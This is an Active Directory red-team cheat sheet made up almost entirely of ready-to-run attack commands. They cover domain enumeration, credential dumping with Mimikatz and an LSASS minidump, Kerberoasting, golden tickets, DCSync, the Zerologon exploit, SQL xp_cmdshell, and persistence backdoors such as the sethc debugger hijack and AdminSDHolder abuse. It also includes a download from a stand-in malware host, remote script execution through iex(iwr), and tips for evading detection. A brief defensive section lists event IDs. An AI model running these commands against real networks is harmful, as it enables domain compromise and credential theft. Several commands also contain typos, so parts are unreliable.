A set of instructions, command and techniques that help during an Active Directory Assessment.
This document is designed to be a used in a red team assesment and contains commands, tools and methods with which anyone can attack and defend active directory.
$ADClass = [System.DirectoryServices.ActiveDirectory.Domain]
$ADClass::GetCurrentDomain()
Get-ADDomain
Get-ADDomain -Identity security.local
(Get-ADDomain).DomainSID
masscan --rate 100000 -e eth0 --ports<port range> --open-only <SCAN RANGE>
Common ports: 21, 22, 23, 25, 53, 80, 443, 445, 3389, etc
Reference: https://github.com/robertdavidgraham/masscan
Nmap all "user$.domain_name" for open ports/services
Tuned Nmap
nmap -Pn -n -A -T4 --top-ports=1000 --max-rtt-timeouts=500ms --initial-rtt-timeout=200ms --min-rtt-timeout=2--ms --open --stats-every 5s <IP/Range>
Get-DomainPolicy
(Get-DomainPolicy)."System Access"
(Get-DomainPolicy)."Kerberos Policy"
Get-ADDomainController
Get-NetDomainTrust
Get-NetDomainTrust -Domain security.local
Get-NetForestTrust
Get-ADForest
Get-ADForest -Identity security.local
(Get-ADForest).Domains
Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'
Get-ADUser -Filter * -Properties *
Get-ADUser -Identity domainAdmin -Properties *
Get-ADUser -Server DC.security.local
Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberName *Properties | select name
Get-ADUser -Filter * -Properties * | select name,@{expression={[datetime]::fromFileTime($_.pwdlastset)}}
Get-ADUser -Filter 'If you have a filter' -Properties Description | select name,Description | Export-CSV "Description.csv"
(Get-EventLog -LogName Security | Where-Object {$_.EventID -eq 4662} |
Select-Object -Property Category,Index,TimeGenerated,
EntryType,Source,InstanceID,Message) -match "domainAdminn" | Format-Table -AutoSize
Get-ADComputer -Filter * -Properties *
Get-ADComputer -Filter * | select name
Get-ADComputer -Filter 'OperatingSystem -like "*Server 2016*"' -Properties OperatingSystem | select name,OperatingSystem
Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName}
Get-ADGroup -Filter * | select name
Get-ADGroup -Filter * -Properties *
Get-ADGroup -Filter 'Name -like "*admin*"' | select Name
Get-ADGroupMember -Identity 'Administrators' -Recursive -Server <> | % {Get-ADUser $_ -prop ServicePrincipalName} | Where {$_.ServicePrincipalName}
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-ADPrincipalGroupMembership -Identity domainAdmin
Get-NetGroupMember -GroupName '*Admin' -Domain security.local | Select-Object MemberName
$Groups = Get-ADGroup -Filter * -SearchBase "OU=confidential,DC=security,DC=local"
$Members = foreach ($Group in $Groups)
{
Get-ADGroupMember -Identity $Group |
Where-Object objectClass -eq 'Group' |
Select-Object Name,SamAccountName
}
Write-Output $Members
Get-GPO -All
Get-GPResultatnSetOfPolicy -ReportType Html -Path C:\Users\Administrator\report.html
Get-NetGPO | select dispalyname
Get-NetGPO -ComputerName <>
Get-NetGPOGroup
gpresult /R /V
Find-GPOComputerAdmin -Computername <>
Find-GPOLocation -UserName domainAdmin -Verbose
Get-NetOU -FullData
Get-NetOU -GPOname "{GUID}"
Get-ADOrganizatioalUnit -Filter * -Properties *
Get-GPO -Guid {GUID}
Get-NetLoggedon -ComputerName
Get-LoggedonLocal -ComputerName
Get-LastLoggedOn -ComputerName
Invoke-ShareFinder -Verbose
Invoke-ShareFinder -Verbose -ExcludeStandard -ExcludePrint -ExcludeIPC
Invoke-FileFinder -Verbose
Get-NetFileServer
Find-LocalAdminAccess -Verbose
Find-WMILocalAdminAccess.ps1
Invoke-EnumerateLocalAdmin -Verbose
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"
Invoke-UserHunter -CheckAccess
Get-ObjectAcl -SamAccountName student1 -ResolveGUIDs
Get-ObjectAcl -ADSprefix 'CN=Administrator,CN=Users' -Verbose
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=security,DC=local').Access
Get-ObjectAcl -ADSpath "LDAP://" -ResolveGUIs -Verbose
Invoke-ACLScanner -ResolveGUIDs
Get-PathAcl -Path "\\security.local\sysvol"
Get-SQLInstanceDomain
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Get-SQLServerLink
start powershell -credential ""
Enter-PSSession -ComputerName COMPUTER -Credential USER
Invoke-Command -ComputerName <> -ScriptBlock ${function:hello}
ls function:
Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName <>
Invoke-Mimikatz -DumpCreds -ComputerName
Exit-PSSession
\PsExec.exe \\Computer -u domain\user -s powershell Enable-PSRemoting -Force
Invoke-WmiMethod -ComputerName <> -Namespace root\cimv2 -Class Win32_Process -Name Create -Credential "domain\user" -Impersonation 3 -EnableAllPrivileges -ArgumentList "powershell Start-Process powershell -Verb runAs -ArgumentList 'Enable-PSRemoting –force'"
Invoke-WmiMethod -ComputerName localmachine.security.local -Namespace root\cimv2 -Class Win32_Process -Name Create -Credential "security.local\domainAdmin" -Impersonation 3 -EnableAllPrivileges -ArgumentList "powershell Start-Process powershell -Verb runAs -ArgumentList 'Enable-PSRemoting –force'"
Get-ServiceUnquoted -Verbose
Get-ModifiableServiceFile -Verbose
Get-ModifiableService -Verbose
Get-WmiObject -Class win32_service | Where-Object {$_} | Where-Object {($_.pathname -ne $null) -and ($_.pathname.trim() -ne '')} | Where-Object { (-not $_.pathname.StartsWith("`"")) -and (-not $_.pathname.StartsWith("'"))} | Where-Object {($_.pathname.Substring(0, $_.pathname.ToLower().IndexOf(".exe") + 4)) -match ".* .*"}
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d “cmd” /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
Rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\temp\crash_dump.bin full
Copy-Item –Path C:\temp\crash_dump.bin –Destination '\\192.168.1.2\c$'
$url = "https://myhost.malware/file.exe"
$output = "./file.exe"
Invoke-WebRequest -Uri $url -OutFile $output
query session
logoff ID
New-ItemProperty "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" -Name "UseLogonCredential" -Value 1 -PropertyType "DWord"
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
Get-ADUser -Filter "useraccountcontrol -band 32" -Properties PasswordLastSet | Where-Object { $_.PasswordLastSet -eq $null } | select SamAccountName,Name,distinguishedname | Out-GridView
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Add-Type -AssemblyName System.IndemtityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"
Invoke-Mimikatz -Command '"kerberos::list /export"
python tgsrepcrack.py wordlist.txt .kirbi
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
Set-DomainObject -Identity -XOR @{useraccountcontrol=4194304} -Verbose
Get-ASREPHash -UserName -Verbose
Invoke-ASREPRoast -Verbose
Get-NetComputer -UnConstrained
Get-NetUser -UnConstrained
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq True}
Invoke-Mimikatz -Command '"sekurlsa::tickets"'
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
lsadump::trust /patch
kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi
.\asktgs.exe c:\temp\ticket.kirbi CIFS/DC.parent.local
.\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
dir \\machine.domain.local\c$
privilege::debug
!+
token::elevate
!processprotect /remove /process:LSASS.EXE
misc::memssp
Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::logonpasswords full"
Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::wdigest"
privilege::debug
sekurlsa::minidump crash_dump.bin
sekurlsa::logonPasswords
Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::pth /user:Administrateur /domain:security.local /ntlm:xxxxxxxxxxxxx"
Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::tickets /export"
Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::ekeys"
dir \\192.168.1.2\c$\Users\<username>\AppData\Local\Microsoft\Credentials\*
mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\164451c5ed8ad780d136e400bd0c50c8
Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::dpapi"
mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\164451c5ed8ad780d136e400bd0c50c8 /masterkey:e605b19f96917ed2a29c816eb2f2cfdb85c9ba67379e62721b77b3ee0e23ec6e253ba6202a1595dc63083212d8933a11bc93fc85c5bac7f04406d5d5af2e57a3
vault::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Vault\"
Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::kerberos"
Invoke-Mimikatz -Command "token::elevate" "lsadump::sam"
mimikatz "lsadump::dcsync /domain:security.local /user:netbios\krbtgt"
.\mimikatz.exe kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
lsadump::zerologon /server:DC.security.local /account:DC$
lsadump::zerologon /server:DC.security.local /account:DC$ /exploit
lsadump::dcsync /domain:security.local /dc:DC /user:krbtgt /authuser:DC$ /authdomain:security /authpassword:"" /authntlm
Rubues.exe monitor /interval:1 > tickets.txt
SpoolSample.exe target client
select * from openquery("dcorp-sql1",'select * from masters..sysservers ')
Get-SQLServerLinkCrawl -Instance <> -Verbose
EXECUTE('sp_configure "xp_cmdshell",1;reconfigure;')AT("eu-sql")
Get-SQLServerLinkCrawl -Instance <> -Query "exec master ..xp_cmdshell 'whoami'"
Set-ADACL -DistinguishedName 'DC=SRV,DC=security,DC=local' -Principal domainAdmin -GUIDRight DCSync -Verbose
mimikatz "lsadump::dcsync /domain:security.local /user:netbios\krbtgt"
kerberos::golden /admin:ADMIINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
kerberos::golden /user:Administrator /domain:security.local /sid:S-1-5-21-123456789-1234567890-1111112345 /aes128:xxxxx id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt
Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=SRV,DC=security,DC=local' -Principal domainAdmin -Verbose
Add-ADGroupMember -Identity 'Domain Admins' -Members testda -Verbose
Add-ObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=security,DC=local' -PrincipalIdentity hacker -Verbose -Rights All
Get-ObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=security,DC=local' -Verbose
powershell.exe iex (iwr 'https://raw.githubusercontent.com/edemilliere/ADSI/master/Invoke-ADSDPropagation.ps1')
Invoke-ADSDPropagation
privilege::debug
token::elevate
sid::patch
sid::add /sam:"hacker" /new:S-1-5-21-123456789-1234567890-1111112345-519
privilege::debug
lsadump::sam
Domain : SECURITY
SysKey : 48e9dfa91da8e1b32a38b9e45323e430
Local SID : S-1-5-21-123456789-1234567890-1111112345
SAMKey : 2c9d7841c1ab3a64b7e0f8d5ee3ad828
RID : 000001f4 (500)
User : Administrator
Hash NTLM: af5adaaf26ccc3fab908fcb5435b49d8
New-ItemProperty “HKLM:\System\CurrentControlSet\Control\Lsa\” -Name “DsrmAdminLogonBehavior” -Value 2 -PropertyType DWORD
REG ADD HKLM\System\CurrentControlSet\Control\Lsa\ /v DsrmAdminLogonBehavior /t REG_DWORD /d 1 /f
Limit DAs login, if DA login is necessary donot allow other administrators to login to that machine.
Never run service with a DA priv Add-ADGroupMember -Identity 'Domain Admins' -Members newDA -MemberTimeToLive (New-TimeSpan -Minutes 20)
Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List -Property *
New-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name RunAsPPL -Value 1 -Verbose
4662 - An operation was performed on an object
5136 - A directory service object was modified
4670 - Permissions on object were changed
4780 - The ACL was set on accounts which are members of administrators groups
4756 - Account was added to security-enabled universal group
4776
Builds profile over time
UEBA in 4 weeks for org
Lightweight gateway on DCs
Ignore Get-NetGroupMember and Get-NetComputer
Use AES256 and AES128 to bypass Over Pass The Hash Detection and Golden Ticket Detection
Envrypted PA-DATA PA-ENC-TIMESTAMP
Create Ticket for non-existent user
DCSync is not spoofable until ST is used
DCShadow is not detected, which allows DCSync
http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html?m=1
https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
If SMB signing is disabled
Spoof
auxiliary/spoof/llmnr/llmnr_response
auxiliary/spoof/nbns/nbns_response
Capture
auxiliary/server/capture/smb
auxiliary/server/capture/http_ntlm
set JOHNPWFILE /tmp/smbhashes.john
Reference
gp3finder -A -t DOMAIN\_CONTROLLER -u DOMAINUSER\
Locate SYSVOL
\\domain_controller\SYSVOL\DOMAIN_NAME\Policies
Metasploit GPP Module
Decrypt GPP Password
gpresult \[/x\], \[/h\] <FILENAME>
Helpful - https://www.gracefulsecurity.com/privilege-escalation-in-windows-domains/
Powershell & C# - https://decoder.cloud/2018/02/02/getting-system/
Mimikatz - https://www.gracefulsecurity.com/privesc-dumping-passwords-in-plaintext-mimikatz/
Incognito - https://www.gracefulsecurity.com/privesc-stealing-windows-access-tokens-incognito/